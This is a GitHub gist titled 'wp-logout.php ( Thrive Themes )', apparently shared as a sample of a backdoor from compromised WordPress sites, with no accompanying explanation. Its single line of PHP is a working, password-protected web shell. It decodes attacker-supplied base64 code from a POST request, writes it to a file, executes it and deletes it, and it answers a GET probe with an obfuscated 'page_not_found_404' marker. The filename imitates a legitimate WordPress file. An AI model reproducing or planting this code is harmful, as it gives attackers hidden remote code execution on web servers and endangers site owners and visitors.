Skip to content

Instantly share code, notes, and snippets.

@magefix
Created April 9, 2021 11:51
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save magefix/5d8d2cf0c98bbcfb7d3e6469fe336c21 to your computer and use it in GitHub Desktop.
Save magefix/5d8d2cf0c98bbcfb7d3e6469fe336c21 to your computer and use it in GitHub Desktop.
wp-logout.php ( Thrive Themes )
<?php if(isset($_POST['zi']) && md5($_POST['zi']) == base64_decode("M2UwZWFhNWFlNGE1NzRjMGYzYjEyOTRmZGQwZTg1ZTQ=") ) {$lt = base64_decode($_POST['a']);file_put_contents('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}}else{if(isset($_GET['cl'])){echo chr(112).chr(97).chr(103).chr(101).chr(95).chr(110).chr(111).chr(116).chr(95).chr(102).chr(111).chr(117).chr(110).chr(100).chr(95).chr(52).chr(48).chr(52);}} ?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment